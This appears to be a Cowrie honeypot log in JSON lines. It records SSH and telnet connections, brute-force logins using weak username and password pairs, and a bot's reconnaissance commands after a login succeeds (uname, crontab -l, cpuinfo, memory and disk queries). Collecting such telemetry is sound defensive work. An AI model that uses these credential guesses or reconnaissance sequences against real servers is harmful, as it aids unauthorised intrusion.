{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-28T13:27:54.427003Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:54.637407Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:27:55.113805Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-28T13:27:55.114487Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:55.320277Z","src_ip":"212.227.125.160","session":"91e42bc34d90"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:55.324444Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:27:55.802426Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-28T13:27:55.803104Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-28T13:27:55.803773Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:56.014005Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:27:56.844423Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-28T13:27:56.845130Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:57.055103Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:27:57.491327Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-28T13:27:57.492032Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":205,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:57.702066Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:27:58.180368Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-28T13:27:58.181081Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:58.390364Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:27:58.867167Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-28T13:27:58.867847Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:59.077879Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:27:59.554611Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-28T13:27:59.555419Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:59.765365Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:28:00.624255Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-28T13:28:00.624925Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:28:00.834214Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:28:01.270928Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T13:28:01.271602Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:28:01.481565Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:28:01.962092Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T13:28:01.963040Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:28:02.172877Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:28:02.651698Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-28T13:28:02.652514Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:28:02.862883Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:28:03.338260Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-28T13:28:03.338965Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:28:03.549670Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.closed","duration":"26.2","message":"Connection lost after 26.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:28:03.551120Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.connect","src_ip":"219.148.159.178","src_port":36101,"dst_ip":"1.2.3.4","dst_port":23,"session":"e7a1a157e058","protocol":"telnet","message":"New connection: 219.148.159.178:36101 (1.2.3.4:23) [session: e7a1a157e058]","sensor":"my-vps","timestamp":"2025-08-28T13:28:08.428920Z"}
{"eventid":"cowrie.session.closed","duration":14.248279094696045,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:28:22.677126Z","src_ip":"219.148.159.178","session":"e7a1a157e058"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33354,"dst_ip":"1.2.3.4","dst_port":22,"session":"db47d0bda556","protocol":"ssh","message":"New connection: 212.227.125.160:33354 (1.2.3.4:22) [session: db47d0bda556]","sensor":"my-vps","timestamp":"2025-08-28T13:28:29.468586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:28:29.470031Z","src_ip":"212.227.125.160","session":"db47d0bda556"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:28:29.632957Z","src_ip":"212.227.125.160","session":"db47d0bda556"}
{"eventid":"cowrie.login.failed","username":"apache","password":"password","message":"login attempt [apache/password] failed","sensor":"my-vps","timestamp":"2025-08-28T13:28:30.126396Z","src_ip":"212.227.125.160","session":"db47d0bda556"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:28:31.450051Z","src_ip":"212.227.125.160","session":"db47d0bda556"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55534,"dst_ip":"1.2.3.4","dst_port":22,"session":"895ffab7353c","protocol":"ssh","message":"New connection: 212.227.125.160:55534 (1.2.3.4:22) [session: 895ffab7353c]","sensor":"my-vps","timestamp":"2025-08-28T13:29:04.598524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:29:04.599550Z","src_ip":"212.227.125.160","session":"895ffab7353c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:29:04.770770Z","src_ip":"212.227.125.160","session":"895ffab7353c"}
{"eventid":"cowrie.login.failed","username":"apache","password":"123456789","message":"login attempt [apache/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T13:29:05.288613Z","src_ip":"212.227.125.160","session":"895ffab7353c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:29:06.463148Z","src_ip":"212.227.125.160","session":"895ffab7353c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35992,"dst_ip":"1.2.3.4","dst_port":22,"session":"e15bab85c056","protocol":"ssh","message":"New connection: 212.227.235.229:35992 (1.2.3.4:22) [session: e15bab85c056]","sensor":"my-vps","timestamp":"2025-08-28T13:29:31.755902Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:29:31.759692Z","src_ip":"212.227.235.229","session":"e15bab85c056"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-28T13:29:32.024073Z","src_ip":"212.227.235.229","session":"e15bab85c056"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33472,"dst_ip":"1.2.3.4","dst_port":22,"session":"e951bf6178b8","protocol":"ssh","message":"New connection: 212.227.235.229:33472 (1.2.3.4:22) [session: e951bf6178b8]","sensor":"my-vps","timestamp":"2025-08-28T13:29:32.638578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:29:32.639543Z","src_ip":"212.227.235.229","session":"e951bf6178b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:29:32.847844Z","src_ip":"212.227.235.229","session":"e951bf6178b8"}
{"eventid":"cowrie.login.success","username":"root","password":"zxc123zxc123","message":"login attempt [root/zxc123zxc123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:29:33.579085Z","src_ip":"212.227.235.229","session":"e15bab85c056"}
{"eventid":"cowrie.login.failed","username":"maman","password":"1234","message":"login attempt [maman/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T13:29:33.721334Z","src_ip":"212.227.235.229","session":"e951bf6178b8"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:29:33.846179Z","src_ip":"212.227.235.229","session":"e15bab85c056"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:29:34.931195Z","src_ip":"212.227.235.229","session":"e951bf6178b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55376,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf2aeeecf3e6","protocol":"ssh","message":"New connection: 212.227.125.160:55376 (1.2.3.4:22) [session: bf2aeeecf3e6]","sensor":"my-vps","timestamp":"2025-08-28T13:29:41.025160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:29:41.026140Z","src_ip":"212.227.125.160","session":"bf2aeeecf3e6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:29:41.206519Z","src_ip":"212.227.125.160","session":"bf2aeeecf3e6"}
{"eventid":"cowrie.login.failed","username":"apache","password":"12345","message":"login attempt [apache/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:29:41.812241Z","src_ip":"212.227.125.160","session":"bf2aeeecf3e6"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:29:43.119225Z","src_ip":"212.227.125.160","session":"bf2aeeecf3e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51798,"dst_ip":"1.2.3.4","dst_port":22,"session":"23a083b0138a","protocol":"ssh","message":"New connection: 212.227.235.229:51798 (1.2.3.4:22) [session: 23a083b0138a]","sensor":"my-vps","timestamp":"2025-08-28T13:30:17.149653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:30:17.150634Z","src_ip":"212.227.235.229","session":"23a083b0138a"}
